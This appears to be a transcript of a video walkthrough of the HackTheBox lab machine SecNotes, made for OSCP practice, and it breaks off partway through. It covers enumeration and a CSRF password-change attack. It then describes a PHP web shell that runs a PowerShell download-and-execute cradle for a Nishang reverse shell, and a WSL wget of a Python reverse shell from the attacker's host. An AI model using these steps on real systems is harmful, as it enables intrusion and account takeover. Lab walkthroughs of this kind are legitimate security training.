Hello everyone, this is Meter and Nuts, and today we'll be continuing our beginner-friendly Road to SCP video series. Today we'll be looking at another HackTheBox machine, that is SecNotes. SecNote is based on Windows and the difficulty is medium, so let's just get started. So first thing what I always do is in any box I run AutoRecon scan. It's a very useful tool. It will do enumeration at first, like it will do few nmap scans on the target machine, and based on that it will do additional scans on them. So it's very useful, but it's like don't always rely on it. 95% of the time it works great, but at times you have to manually enumerate things further, and always know to run your scripts manually as well, like the nmap scans and SMB scans and so on. So I'll be running this tool as root. So I'll be giving sudo over here because I'm running the box as Kali. I'll be giving Python 3. In order to run this autorecon.py file, I'll be giving the target IP that is 10.10.10.97. In the case of SecNotes, I'll be giving the host switch for the output directory. So I did already execute the scan, so I don't want to do it again because it may take some time. So let's just look at the scan results. The first thing what I always do is I look at the full TCP and map scan, and we have three ports open over here, that is port 80 running HTTP, and the web server is IIS-10. So it's very latest web server. Obviously whatever version you see, first thing you should do is check in search exploit or exploit DB or on Google, but I don't think there is anything for this because it's quite latest. So we can move on. So we have port 445 over here as well open, so probably we can check for anonymous shares, like guest logins in SMB. So we can check for that. This is SMB port, by the way. So yeah, and also we get Windows 10 Enterprise, so obviously like some OS information, potential OS information. And also we have 8808 over here running HTTP again, and also it's running IIS HTTPD web server. Okay, so these are the and obviously you get methods over here as well, like trace, get, head, post. If you had probably a put method or something, so we could probably add some file or something like that. So okay, so we have yeah, we do get our host name over here, that is SecNotes, and yeah, that's we get the SMB version. I guess it's 2.02 over here. Okay, so don't think we get anything else. So what we'll try to do is let's just move on. First thing, obviously we have port 80 and 8808 running HTTP. I will check for 445 first because SMB port, probably you'll have a guest login. You may get some file or something which would be interesting. So if you check out the other scans over here in SMB client, it says access denied. So SMB client in AutoRecon, the first scan what it does is it does a guest login scan, and if you see all the sides, like in all the SMB scans, it says authentication error. So most likely, the guest login is not possible over here. So but then it's like don't always rely on AutoRecon. So let's just try to do it manually yourself. So let's just do U for guest login, give the edge switch for host, U is for username, and leave it blank for guest login. Give the IP address of the target machine, that is 97, and probably you'll get the authentication error again because guest login is not allowed over here. So it says authentication error. So you can private SMB client as well. It's going to give the same thing. What I'm just trying to say is if you see scans authentication error, try to run it manually because sometimes it acts weird, and we have seen in the previous videos as well. SMB client may show the shares, but SMB map may not show the shares. So that's why just be careful and try to rule out this particular SMB map guessed out thing before going further. Okay, now we have port 80 over here running HTTP. So what we'll do is let's just try and quickly look at port 80. So if we look at port 80, we have a custom login page over here. So obviously whenever you have a web application, there are two things which you should always look for. So first is like your if it is a vendor specific or open source web application. So why that is important is because you may get default login credentials for that, you may get vulnerabilities for that, you may get versioning and all these kind of things. If it is a custom application, obviously you have to find your way through in by custom exploitation or something like that. So those are the two things which we can use. Obviously if you have custom application, also try to use common credentials like admin and password. Or if you get the host name, I think we got a host name over here as well. If you see in the nmap scan, it says SecNotes. So potentially add this as the password or something like that. So if you add admin and you do login, it says no account found with that username. So in short, there's no such account present over here, and we can try to play around with it more. We can try to sign up over here. Okay, before that, what we'll try to do is we'll just check out the AutoRecon scans. Sorry, the GoBuster scan and AutoRecon. So if you look at this, we get multiple things over here like contact, register, all this kind of thing. So register is nothing but obviously it looks like if you click the sign up page, it's going to bring the register PHP. So it's the same thing. And obviously you have another 302 present over here. So this looks like a redirecting site. So it's going to redirect you because you have to log in. So probably, I'm not sure why I selected that. Okay, so if you go at home PHP, it's going to redirect you to the login page because you have to log in order to access these other pages over here. So we'll try to look at that. And I did run a small txt scan as well in from using GoBuster. So these are the pages which I did get, and almost more or less the same. And you have the login page which is 200. So 200 is which you can access very well. Sometimes 302 is also you can access because it redirects you to some other pages. But this thing over here, it's redirecting you to the login page itself. So that's why you need login access. Okay, so we know this about this particular page. Another thing, just want to pause at 80 for you now, and we'll just look at port 8808 as well, because let's see, the thing is obviously if you find something over here, try to move on, like try to not move on, but do sign up now, try to create an account, see if that thing works and see what's there inside the page. But just want to show you all that what is there behind 8808 as well, because sometimes it happens that just try to have a quick overview of what's there on all the ports maybe first, and then because at times it happens that you may spend too much time on port 80 and you may forget that there's another port 8808 until unless you look at the scan again. So otherwise you can mention over here as well. So we have port 445, no guest login for now. So obviously we have port 80 over here. Okay, we should have mentioned port 80, but still never mind. Okay, so port 80, it says we have a login page with sign up, and we have port 8808 present over here. That is okay, we'll just check that port out. So 10 10 10 97, give the port number 8808, and we have this particular page over here which says Windows Internet Information Services and different languages, I guess. So we have English over here, but it looks like this is a image file. So if you see, it's getting this thing, and it's going to take me to some other page over here. I don't want to go over there. So obviously if you do view page source, whenever you come to a custom application, you can do view page source. Obviously you can do it in 80 as well, but you not get anything over here. I'm just saying to check out for accounts or something like that, like some comments or something which would hint you towards something, but it's nothing's present over here. Obviously here it's a reference link which once we click this, it's going to go over there, and this is the source, the image file. So this is that PNG file which would obviously present after this thing. If you click on this, it's present after this in this particular working directory itself. So that's it, nothing interesting over here. So we'll just put up nothing interesting for now. Okay, so we do get that IIS page, right? So if you look at this, let's just copy this for now, probably may be useful later, but I know that picture is not important itself, but maybe the naming would be important later. Okay, so what we'll try to do is we have this login page. Another thing, I did not find anything on port 8808, right? I did, AutoRecon did run GoBuster on that. So this is the AutoRecon scan. I don't trust AutoRecon GoBuster scans because at times it works, at times it does not work. So I do it manually as well myself. I did do a common txt with extensions and a small txt, and there are no other files. I could not find anything over there. So yeah, don't forget to run GoBusters as well in all the HTTP connections. So we have login PHP over here, we have username, password. We did enter the, like admin. We did not get anything or admin password. And over here we get a hint, it says no account found with that username. So in short, it is hinting that, probably this admin user does not exist at all. Okay, and over here in password, obviously we'll have to check for that. But over here, this is like hinting that this user does not exist. So let's just try to create an account and see if our user, if we get some error or not. So I'll just create an account with mutated nuts, and also the password I'll enter is mutated nuts itself. Okay, so I did enter mutated nuts, confirm password, mutated nuts, and I'll submit the request. So I did not get anything as login created or something. But if I enter mutated nuts now over here, and for password, I'll not enter mutated nuts, what I entered earlier. I'll just enter admin or like some wrong password. This should show you all something that it does not say that, this account does not exist. Now it says that probably this account, obviously this account does exist, but the password you entered was wrong. So this is one bad practice, obviously, for developers as well. You should never let the user know that whether he has entered a wrong password or a wrong ID. So you should always have it like, invalid username or password entered, something like that. So because this, literally if I'm an attacker, I know that this particular mutated nuts user is definitely present over there, but I just need to find a way to get his password. If this is not present, then there are two things to guess for, so that's a big task. Okay, so we have mutated nuts over here, and we'll have password. So let's just enter our valid password, that is mutated nuts, and let's hit login. So we come across this page over here which says, and on top it says, due to GDPR, there should not be any PII information present. Please contact Tyler SecNotes HTTP. So over here, in short, we get a potential username as well as we get a potential domain name. So one good practice you all should add in your methodology as well for OSCP exam. It's like, you should always, whenever you see an domain name, take this and add it to your etc host file. Okay, it may reveal multiple things or different sites, okay, because of the host name or domain name or subdomain names. So try to do that. If you don't do that, it's like, sometimes you may get stuck. So try to add this thing, but in this box it was not useful at all, so we'll not do that in this box. But yeah, we have Tyler over here as a potential username. So what we can do is we can just add a potential usernames. We can add Tyler over here. Okay, so what it says, send an email to Tyler, and over here we come across multiple things like new node, change password, sign out, contact us. So obviously we can check for all these things over here. Let's not do sign out because we may get logged out, and we have contact us over here. So if you see over here, we can try to create a new node, and if I check something like this, node from, okay, probably mention like subscribe. Okay, so this is a node which I'm trying to create. Obviously, if you create this node and if you see over here, we get this node present over here itself. So in the same text, whatever I entered, and we are running PHP. So probably this thing, when I try to, create a PHP code or something over here, it was not getting executed. So obviously that was the first thing which I tried, and it was like, try to create a new node and add a like, PHP ecosystem request or who am I, something like that. But that did not work because I think it does PHP get content. It uses the get content instead of include or something. So that's why, in short, PHP does not work over here. So you have to find a different way to, probably get RC or something like that. So we have a change password over here, which is interesting. Why? Because in change password, obviously you need to always have the current password as well. Like whenever you want to change a password, you should be asked for the current password as well, because at times it happens like in such scenario. Suppose if you are logged into a web page and you walk out and maybe someone else comes in your system and they will try to change your password because you're logged in. They can do multiple activities, that's fine, because you left it logged in the first place. But if they're trying to change the password so that you don't access it as well, so it will ask for the current password. That's the best practice you should follow, like even developers should follow. But over here it says like you don't need to know the previous password. So that means I can just change my password, like which was mutated nuts earlier. I'll just change it to new password. Okay, so that is just NEW, new password over here as well. And I save it. I did not enter my mutated nuts old password. So if I'm an attacker, I can just try to change the password if I'm logged in a genuine session. So that's how I did change it, and obviously we did get new password and it says password updated. Okay, and we have a contact us page over here which says you can send a message to Tyler. So this is another interesting point over here, because if you try to send some URL or something to this particular user message, so there's some back job which is running and which will try to click it. So we can just confirm. Obviously I did try over here when I created a notes, this is vulnerable to access as well. You can enter like script for document.cookie and all these things. So I thought to enter the same thing over here, like try to send some session ID or something like that, but that did not work. So you have to enter like a URL or something. So what we'll try to do is we'll just quickly see if this particular, there's some automated job which is running, which is going to click the link or something like that. So what we'll try to do is we'll just create a Python HTTP server, Python 3 HTTP server. So we'll be giving the M switch for module HTTP server and probably run it at 8000. If you don't add 8000, by default it will run at 8000. I'm just showing you all if you all want to add any other port number. So we are running over here, and if I just try to send a message, that is HTTP 10.10.14.28, this is my HackTheBox VPN IP address, my attack machine's IP address in HackTheBox VPN network. Okay, so this is my IP address over here, and I'll be giving the port as well, which I want to reach because it's not by default 80, and because I have changed it to 8000, right? Okay, and also I'll be giving this probably like test.txt. So I'll just send this link and see if we get a hit or something over here. And we see that we do get a request, a get request. So in short, we are getting a get request from the target machine, that is 10.10.10.97. Okay, so in short, we do get it. Obviously, this file does not exist. I was just testing that the request comes or no. So it does come. So in short, this would be probably useful later for us. But what we'll try to do is we'll just sign out for now. And I'll just show you all a few other things. That is, obviously, we can check if that user Tyler is present. We can add any password. We don't know his password as of now. So it says the password you entered was not valid. That means this user Tyler is a valid username, at least for the web application. Okay, because web application may have multiple users. Okay, like admin, all these kind of things. But the target machine, the OS, would have different users, right? So we have Tyler over here, we have password, but we need to figure out his password. But let's just see. What we'll try to do is we'll just enter million and nuts, and I'll enter my new password which I had entered earlier, right? So NEWPSSWRD. So that means obviously my password has changed. It's no more muted and nuts which we entered at the first time. Okay, now what we'll try to do is we'll just try and see this change password method, because if we try to send this particular link, somehow we are trying to send this request, not link, but if we send this request to probably Tyler in this particular contact us page, so we can probably try and get Tyler's password modified or something like that. So we can probably try to add some custom password for Tyler. So what we'll try to do is, first thing, we'll just go and send this request to Burp Suite, because it makes things very easy over here in Burp Suite. So we have network settings, go to settings over here, do manual proxy configuration, and set this to the localhost IP address. This is a localhost IP address. Set this to this port itself, 8080, and press OK. Start Burp Suite over here. So we have the interceptor on. I don't want it to be on. I'll just keep it off for now. I just want to see the request what we are getting if we change our password. Okay. So the change password is here. Our current password is new password. So I'll just change it to like password 1 for now. Okay, because we may need it. So I'll just change it to password 1. And I'll submit this request so that I'll get it in Burp Suite. I hope you guys know what I'm trying to do using Burp Suite. I am sure many of you guys may be aware, but since it's a beginner friendly series, I'll just try to tell you all quickly that using Burp Suite, we are creating a proxy over here. Okay, and the connections what will come from Kali machine will go to Burp Suite first, and it will go to SecNotes and vice versa. Okay, so this is what's gonna happen. And also when the connections come and go, like you can try and capture, like intercept it and modify it, or you can use Burp repeater to use the same request later. Okay, so you can do multiple things with Burp Suite, very handy tool. And obviously you're running the proxy at 8080. So yeah, so we see that we do get our request over here, that is the change pass request. And if we see over here, we have, okay, this is the get request which we got, but we did get the change password request. So let's see that we have this password which is present, which is a post request, and we have confirm password and it says submit. So what we'll try to do is send it to repeater. And first thing what we can do is we can try and see if we can change this obviously to a get request. Why get request is because in post request I was trying to do the same thing, since Tyler is clicking a link, right? Sorry, clicking a link over here in contact us, I was trying to create some link or URL which, and I would try to probably add like a script or something like that, a huge script over here which would be like having the post details and everything. In short, I was trying to do a CSRF attack over here, but it was like not very successful because I'm not sure what was going wrong over there using the post request. So we, if we see over here, if we some way if we try to get this request as get, so in short, we will try to, we can, try to change this password, Tyler's password, right? So we have post request over here. So post request is basically your header is in the the request body over here. So not the header, sorry, the parameters or the data is present in the request body over here. So if you change this request to get, and you'll probably get the get request over here itself. Let's just see, right click over here and do change request method. So we get a change request over here, change password 1 and this confirm password and submit. So what data we had over here, right below, it has gone over here. And at times, obviously there are multiple restrictions. You cannot do it for all post requests because sometimes the web application is modified in such a way you can only send post request, not get request. It will tell you that this request is invalid. So you can, the method type is invalid. So in short, we have the change PHP password 1. This was the password one which we set earlier, right? So now let's just change it to password 2, and we'll change over here as well to password 2 and try to send this request and see if our password gets changed. Okay, this is the same request which we used earlier to create password 1, right? From new password we change it to password 1 for muted nodes user. So let's just try to do the same thing again. Let's just do send, and we get 302 found. So it's trying to redirect. So let's just follow this redirection over here, and it does redirect you to the get home page which we saw earlier as well, right? It took us to this get home page over here. So what we'll try to do is, if we scroll below, it says password updated, the warning which we got earlier over here, right? Password updated. So it looks like that. Let's just quickly confirm that our password got changed. So let's just do sign out, enter muted nuts over here, and I'll enter password 2, and I'll log in, and it does let me log in. So in short, what I did was I just changed the method to get request, and I was successful to do that. So what we'll try to do is we'll take the same URL and send it to Tyler. Okay, so we'll just create this. I'll just enter HTTP 10.10.10.97. You can enter localhost IP address as well, but let's just enter the network address, that is 97 of the target machine. Okay, this is SecNotes IP address, and also we'll enter the change pass. Remove this. Okay, so this is what we copied from Burp Suite itself. I did not create it, the request, because we want to change the password. And I just want to change the password, not password 2, but probably just enter muted and nuts over here so that we know that we have properly changed the password. So I enter muted and nuts over here. We have submit. Okay, this is the link which I require. If I click this link, then my password would change to muted and nuts. So I can quickly confirm as well that this link is working. I'll just take this, paste it over here. I do that, it says password updated. So if I sign out now, and if I try to log in again, muted and nuts, and I'll enter muted and nuts again over here, it does let me log in. So in short, my password was changed using that URL. So that means if Tyler now clicks on this particular link which we just created, right, the same link over here, his password would change and to muted and nuts, and we would probably get access to his account, and this would be a CSRF attack, that is like your cross-site request forgery. So we'll just send this thing, and it says message sent. So obviously that Tyler should click, but some way we do not obviously know if the password was changed or no unless we validate it ourselves manually. Let's go to username. Let's enter Tyler over here. Let's enter into the nuts, and we log in and we see that we successfully log in over here as user Tyler. Okay, so that means we successfully exploited CSRF vulnerability over here. So, and we got inside this user Tyler. We can look at this, you know, these notes over here, which says like some cooking recipe, and we do have yours over here, which is not very useful, and we do have news site over here, which says SecNotes, news site, Tyler, so and so. So in short, we got some creds, right? So let's just copy this cred. Over here, we have potential username. Let's just copy the credentials as well. So we copied the credentials. Now we need to validate this credential somewhere. Obviously, not on the web application itself because you already have access to it, right? Maybe this this credential would be used somewhere in like SMB map. Okay. So what we'll try to do is we'll just try and first, actually, I just want to tell you all like how this CSRF attack actually works. And CSRF attack is nothing but, you know, as we just saw over here, we sent Tyler something. So we are muted and nuts over here now, and we had created this URL using, you know, from post to get request. We had changed this URL, right? And we have a user Tyler over here who's an administrator but is unaware of CRF attacks or InfoSec. He's just not very familiar with information security and everything. But yeah, he's managing the web application and he's not aware of anything. So we just send him this particular link. Okay, so Tyler is a beginner, he's a new joinee, he's a like, you know, newbie in this particular professional. But he does not know anything. So I'm just sending him this particular note. Okay, so this is for my machine, but as we saw earlier, right, we should obviously have something like a current password parameter over here, which would probably validate that this particular thing requires a user input. Like, you know, if I enter current password, which was maybe password 2. So if I enter password 2 and then I enter this other things, that means this input should come from Tyler. What his current password was before I change it to muted and nuts. So this would probably limit CSRF, at least not CSRF exactly, but at least the password change. It would not limit CSRF, but the password change thing. And yeah, but that did not happen, right? This parameter is not present at all. So what it's doing is obviously just changing this. If I send it to others also, right, if I take this URL and I send it to, if there are other users present in this particular SecNotes page over here application, so if I send it to them as well, if they click this link, their password would be changed to muted and nuts. Okay, so this is how it would work, and I can probably access it because there's no validation from Tyler that, you know, he requires something to enter which only Tyler knows. Okay, there is nothing as such. I'm just clicking this link and the password gets changed. So this user Tyler gets this particular link. He's like not aware. He's like, oh, it looks interesting, so I'll just click it. Okay, so this is how it, you know, he tried to click it and his password got changed for him because there's nothing specific like user or something like that because he's logged in. Yeah, another thing, he should be logged in with a genuine session ID or something in order for this attack to work. Otherwise, it would not work. Okay, so I'll just show you all how it would not work because I'll just try to log out. Since you already got the password, we'll just log out for now. We'll just do, okay, now I'll try to send this request. I'm logged out, okay, so my browser does not have my browser would have the cookie, but the server would have discarded my session ID. So if I try to hit this, I'm not logged in now. It gets me to the login page itself. That means no password was changed. So that's why it's crucial that you should be present and logged in first. You should be having a valid session ID and valid session in short. So then only this attack would work. Okay, so this happens when, you know, especially like you have Facebook and Gmail, all these kind of sites where, you know, you logged in and it says keep me logged in. So that means you're logged in forever over there, and obviously they have multiple defense mechanism for CSRF attacks. But that's where this thing would happen, right? If I just see this link, but obviously the modern attacks would not be something like, you know, I'll just send the exact URL to him. I'll send something like click me for latest application bugs, something like that, or latest application software, something like that. Okay, so Tyler, since he's the application owner over there, he'll be like, oh wow, there's something present over here. But obviously this is like the hyperlink which would be there, and behind that it would take you to this particular URL. Okay, so obviously you have hyperlinks over here as well. If I click login, it will take me to some other web page or sign up now. So if you look at sign up now, where's sign up now? Okay, it says over here we have sign up now, and the reference is the register PHP page. So that is the register page which will go to. Okay, so in short, it is going to do that. So obviously Tyler would be like, hey, I'm little aware I am not allowed to click URL and everything, but this thing looks interesting to me. Click me for latest application software. So I'm like, hey, I need to know about the latest application since I'm a web developer or something. So I'll just try to click this. So once he clicks it, obviously, and he's logged in into this SecNotes application as well, so his password was changed. So this is how CSRF works, and for that, in order to avoid CSRF, you can create a CSRF token. So this is mainly used for like banking application and like some secret or like very sensitive request. So probably you'll get that CSRF token in the web page response in the form of HTML hidden hidden file, not hidden file exactly, but the hidden parameter. And once you send a request, the web application will first check for that CSRF token, and probably the CSRF token is 1. So if you try to create something like okay, let's just quickly see. So if I now, this is the change password, right? It's as simple. What if there was new password over here? How would CSRF be how would CSRF be present? So what it would be like, it would be something like, just remove this, will be like send money, okay, transfer money PHP. So this is our banking application which is transfer money PHP, and the parameters are account number to transfer to. So this is my muted and nuts account number that is very malicious in nature. So 54321, that's my account number. And also we have something like, we have amount. Okay, so obviously we need to give the amount. So I'll probably give amount as like 1000 USD or 10,000 USD because I need a lot of money. Okay, so we have this particular request, and this is our banking application over here, that is vulnerable bank. Okay, so this is a vulnerable bank over here, and it says transfer money. So in short, Tyler is again unaware of CSRF attacks or InfoSec or anything. He's not even a web developer now. He's just a normal user, because see, most of the users don't know about security and stuff, right? So we have this particular link over here, and over here it will be probably like click me for latest video games link, something like that. So he's just he's very fond of video games and such. So I'll try to create this particular attack on him. I'll probably send him an email or something like that, and that link would probably have something like this. So if he is logged in into his bank account, that is the vulnerable bank, and if he just clicks this link, it will be like send money to this account number, that is 54321, and the amount is this, and click submit. So this is how CSRF would actually work, and he'll click the link, and the amount like 10,000 USD would come to my account, and I'll probably be a bit richer. And so this is what it would look like. So in order to avoid this, we have CSRF tokens, and CSRF tokens would be like, if I click on the banking application, okay, so if I go for every request which I send, there'll be a CSRF token which I would get in the response, okay, in a hidden field. So I'll be getting that, and once I send another request, if I send this request, okay, and if Tyler is not he does not have the banking application open or something like that, so if he just clicks this, and if CSRF token is required, so the browser would not get the CSRF token because that response is not present, right, which is the CSRF token present earlier. And obviously CSRF token is a long token which keeps randomly getting generated. So if I send this particular request, and it will check for the CSRF token. Suppose the CSRF token which was sent by the server earlier was like 10, okay, the number 10. And if I try to send this request, and obviously it will check for the web page for any response field, but it does not find any CSRF. If I manually send a random CSRF token as well, like probably 5, I have to guess it, right? but it would not work. Obviously, it's not going to be 10 like 2 bytes long. It's going to be like 8 characters, not 8 exactly, but it depends, 32 characters, whatever. So it can be long as well. So it was not going to work. So that's how CSRF would avoid it. If I want to go into detail, probably some other time. But yeah, this is what the gist of it. And CSRF token would avoid this particular kind of attacks. So this would be like invalid CSRF token, and it would not let you do this particular request. Okay, so we have okay, now let's move on, and we do get the password, right, which is present over here. We'll copy this password, and I don't think we require this thing anymore, Python 3 HTTP server. We'll just close this for now, and let's just try to SMB map and see if these are valid Tyler credentials. So let's just do password over here, send this password p, and do host 10 10 10 97. So this is the SMB map syntax. And if you do that, it says IP this and working on it. And one more thing, if you guys get an error over here due to this exclamation mark, like you probably get an error that bash event not found. So what you have to do is you have to do the set in your bash terminal itself, do set and the capital H switch. So do this so that history thing would not happen and you will not get that error then. So if you guys are getting that error, if you enter the password over here and this exclamatory mark is present, so please do this if you're not using that history kind of thing. So if you do this, you would not get any error and it would work fine. Okay, so we have the SMB shares listed over here, and we see that we have read-only access to this IPC. Obviously, we could have checked this share to see if there are any other creds or something present. And we have read-write access over here in this new site. Okay, so in short, we have read-write access. So let's just log into this new site using SMB client. So SMB client, we'll be using that, and we'll be giving the use switch. Over here, it's a bit different, the syntax. You have to give this person sign and then give the password and then give, okay, my bad, before that, SMB client, give the share which you want to connect to, 10 10 97 and new site. So let's do that, and then the host, that is 10 10 10 97. Not the host, but over here you'll be giving the I switch. Okay, let's do that, and we did see that we did get this thing again. Let's just try doing set edge and see if this works. I'm not sure it worked earlier, I guess. So let's just try copying this thing again. Again, it says the same thing. I'm not sure why, but I did do set edge, and for some reason it did work earlier. Let's just try closing this thing and try to load it again. Okay, for some reason it does not work again. But yeah, what we'll try to do is in SMB client we can try to do a username, and then probably it will prompt for the password, so we can do that and then enter the password for this. Yeah, so we'll just do this and then we'll enter the password now. And we do get access over here to the share. So we have IIS start HTM over here, IIS start PNG. So this is like, this particular page over here, this PNG file. If you see earlier, we did say that we got a IIS start PNG file present over here, right? So this looks like that, and this looks like the IIS start HTM. So in short, what we'll try to do is, this is like, the new site, that is your 8080, which is present, right? So it looks like that's the directory of that. So in short, if we write some reverse shell command over here, so we'll probably get some reverse shell. If we execute that, we'll get some reverse shell. So what we'll try to do is, we'll just try to add a reverse shell and create a reverse shell first. So let's just go back to the exploit directory, create a file over here, and I think we'll just end this session for now. Go to exploit and then add the password again. Create a document, that is your reverse PHP, Go probably like a test PHP to see if remote okay, another thing is go to 8080 first, sorry 8808 go over here, go to inspect element first, go to network and try to reload the page. Since it's running IIS, right, it's most likely going to be ASPX file. Okay, so it's running ASPX, but that's not the case over here. If we just look at this get request, look over here, probably you can check for others as well. But if you look at the get request over here, we do not get any like powered by ASP.NET or something, and in the cookie we get a PHP session ID. That means it's running PHP. So this is one way to check out whether it's running PHP or it's running ASPX or something. So it's running PHP over here, it's not running ASPX, so that's why we'll have to create a PHP payload. So we have test PHP over here. What we'll try to do is we'll just try to create a PHP payload, that is this PHP echo system. We'll just do who am I for now. I think the files whatever we enter in this particular directory keeps getting deleted by some job. So let's just create who am I. Obviously we could have created the request parameter and added that, but for some reason that does not work correctly. Like it keeps getting deleted, I guess. So let's just do this who am I and see if we have successful remote command execution. Obviously we'll save this file test PHP and we'll try to upload it over here using the input command. So we'll be using, let's just look into the directory first. We'll be using input over here and save the command, that is your save the file, that is test PHP. We'll be uploading this file because why, we have write access in this share, that is your new site share. So it does say putting the file. If you do dir over here, it says test PHP. So what we'll try to do is let's just look at test PHP over here, and we do get RC. So SecNotes styler is present in the target machine itself, and we do get RC over here as who am I. What we'll try to do is now we can create another file and just try to rename this to reverse PHP. Instead of this who am I, we can enter a PowerShell command over here and we can try to create a PowerShell reverse shell. So obviously I do know PowerShell gets executed. Before that you can just check for PowerShell as well, but I very well know that you can enter PowerShell commands like probably doing this PowerShell and see who am I, something like that. But I do know PowerShell commands get executed over here. So I did check it first, but you guys can check it as well if you all want. Make sure that PowerShell is running before sending a PowerShell reverse shell. Otherwise it may be a lot of things over here, like if it does not work. So you have to have the PowerShell reverse shell PS1 file. If you guys don't know where to get it from, go to Nishang PowerShell and go to this web page over here. Go to shells and over here you will get a invoke PowerShell TCP PS1. So this is the file which I do have in my system and I already have it downloaded, so I don't want to download it again. And also this particular last line would not be present, so the file if you download it, it's going to be this thing itself. So last line you have to add it from here, from this example over here. So we have to add this invoke PowerShell example. Take this, copy this thing. In short, we are just calling this function in the end, once this file gets uploaded in the memory, since it's a Windows machine. So it is going to get uploaded over there, and in the end it's going to call for this function giving these parameters over here. So in short, it's going to call this entire function over here. So that's why we'll just write it in the end itself so that we don't have to manually call it again later. Okay, so let's just give 10, 10, 14, 28. This is our IP address, that is your attack machine's IP address, and the port, let's leave it 4444 itself. So let's just close this file now, and what we can do is take this, copy the file name, and over here in PowerShell we'll add our IEX command so that it calls this for this particular file, because first we'll host a HTTP web server. So we can do that over here. So Python 3 mswitch HTTP server and the port 8000. So we can do that, and then later on we'll call for this particular IEX file. So we'll be using the the PS1 file. So we'll be giving ix new object, then we'll be giving net web client. So this is the Microsoft PowerShell command. I'm not creating on my own. You can Google it, that you know how to, the ix command for download string. It will give you the exact same command, and we'll be giving download string. So this is the command which I'm giving over here. It's like getting the file and storing it in the memory and executing it, because in the end we call for that function, right? We saw that invoke and we had written the reverse shell over here, this thing. Okay, so we do that, download string 10.10.14 will give the attack machine's IP address, so that it calls for this file from this HTTP server which we are hosting over here, the Python HTTP server on exploit directory, and then we'll be giving the file name as well, which we copied earlier, that is the PS1 file. We're giving the codes, make sure the codes and everything is proper so that you don't have any errors. Yeah, so this is the echo system. I don't think we require echo, but you can leave it if required, but we can just remove the echo. Yeah, so we have this reverse PHP file. What we'll try to do is, we'll just try to put this file now over here. So we'll be using input and we'll be putting reverse PHP. Yes, put this file, press Y. We do have the file in the SMB shell. See, I mentioned, right, the test PHP file, for some reason it went away, which we had uploaded earlier. Okay, so now what we'll try to do is, we need a netcat listener on port 444 to catch the connection of PS1 file which we are going to execute. So first we'll try to load this reverse PHP file. PHP. So let's load this file. Let's see if we get a GET request over here, Python HTTP server. PowerShell, I think we added the right command. Oh, we do get the GET request over here from the target machine, and if you look at the shell, we do have a PS shell over here. So it's recommended always, whenever you do a Windows box, try to get a PowerShell shell, because if you get a CMD shell, that's fine as well, but at times you can do multiple things with PowerShell over here. So in short, we get a PowerShell shell, and we are in the system as user Tyler, and obviously we can check for system info over here. This is the first thing what I do in this box, and in Linux I'll be using uname, sudo-l, all these kind of things. System info is somewhat disabled in this box, I guess, so that's why I cannot run it. So in short, we'll probably go behind and go to our home directory first. So let's just go to, there's a users directory, so let's just go there. Go to Tyler, because we are as that user, we'll be having access to it. Go to desktop, and we do get the user txt flag over there. We can very well read it as well. Obviously we have multiple shortcuts present over here. We do have bash shortcut as well, but yeah, whenever you come in the Windows box, obviously you can check for the files present in the users directory. If there is anything suspicious or any new file present, you can check for the modified date as well, that you know which date if something else is modified. And also you can check for those basic enumeration, manual enumeration. Then you can have some fuzzy security checklist, and you can go through it and see if you find something interesting. Okay, so we have this thing present over here, which is bash, and I'm not sure why this was present. So what we let's just go back. I'll probably just go back to the directory. Okay, so if we go to distros directory over here, okay, so if you go to distros, so it's nothing, again, not tunnel vision, but I just try to check all the directories. Second thing is, if you want to manually check a few things, go to the web applications and check if there are any database credentials or credentials present in the config file or something like that, which would probably be an administrator reused credential or something. So we have distros over here. So let's just go to, let's just see, we have Ubuntu over here. So let's just go over here, and we have Ubuntu, we have something called as ubuntu.exe. So this was something new which is not present in all the Windows boxes. So I tried to Google a lot. I was like, ubuntu.exe in Windows or something like that. So let's just try to do that. So we have ubuntu.exe in Windows, because that was strange, right? So because there's Ubuntu file present in Windows, and this is not present in all the Windows machines. So if I do that, it says where's the path. Okay, so there's some path over here which says shell command line. So in short, I tried to go across multiple things over. Then what I realized was that probably we can run Ubuntu or bash commands in the Windows machine, because if we check for other things, just wait. We have multiple things over here. It says you can use this particular command. I don't think I tried that, but in short, there are multiple things, and I get, I had to obviously try to go across multiple pages. I was trying to enumerate and trying to find out things. In short, I did find that, there's WSL in Windows where you can execute Linux commands if this ubuntu.exe is present. Like, so I can execute Linux commands using WSL. So if you do WSL for Windows, so we do get, it's like, Windows subsystem for Linux. So that means you can run Linux inside Windows. So this is what this WSL is about in PowerShell, and you can use PowerShell to use and execute this WSL command. So I have WSL over here. So how to execute commands. So if you do this, probably you'll get few things like you can use WSL and the command name using PowerShell. You can do it from Windows CMD as well. I don't think I tried it, I'm not sure, but yeah, you can check out with PowerShell using WSL and try to add some Linux command. Okay, so what we'll try to do is, we'll try to do the same thing over here. We'll do WSL, we'll do UMI. It says we are root, so it's not even administrator. So most likely it's like, obviously if you do uname over here, so it says like Linux SecNotes, so and so. This is like the Linux system over here. So that's our WSL. So that's why we can use WSL over here. If we do WSL LSLA, I think it's going to list down this current directory which we are in. But what we'll try to do is, we'll just try and see if we can get a shell as this root user. Because first thing I was like, oh, maybe there's a Windows subsystem. And since I'm root over here, obviously that does not mean I'm administrator in this box. So first I thought maybe I'm root, I can access the files as Linux. So I can probably try to go and access the file as administrator over there. But I don't think that's going to work, because this is this thing is running as some low privilege user, I guess, not administrator, the Linux thing. But yeah, so what we'll try to do is, we'll just try to do WSL and do an LSLA on the TMD directory in that Linux subsystem. So if we do that, we do not have anything over here. We'll just try to create a Python shell and try to execute that. So first thing, we'll just locate the reverse py file. This is the reverse py file which I have created, not by myself, but I'm using this particular Pentest monkeys script. I just tried to modify it a bit. Reverse shell cheat sheet. This particular Python shell, I just modified. I just removed this entire first command and I added this in every other line. So you can see once we try to copy it, reverse py, and just paste it to our current working directory. My bad. Copy. Okay, so we have this reverse py file, and this is the file what it looks like. We have the, I'll just change the IP address obviously to 28. That's my attack machine's IP address, and leave the port 555. Leave it different than what you had called over here. So let's leave it at 5555. And what we'll try to do is, we'll just try to copy this file, since our Python HTTP server is already running. So we can just do WSL. We can use a Linux command using WSL. So let's just do WSL wget. We do have wget present over here. It says add for more option. And PowerShell is somewhat buggy, I guess. So you have to hit enter so that you get the new line. Okay, so let's just do WSL wget 10, 10, 14, 28 and 8000 for the port where the HTTP server is running, and the reverse py file, and we'll output it to the TMP reverse py. This is the Linux machine's path. Okay, so let's just do that. It says saved, but let's just hit enter, and let's just WSL LSLA on the temp directory. So we do have the reverse py. Obviously we do not have any execute permission. Let's just do 777 chmod. So chmod 777 reverse, not reverse py now, but tmp reverse 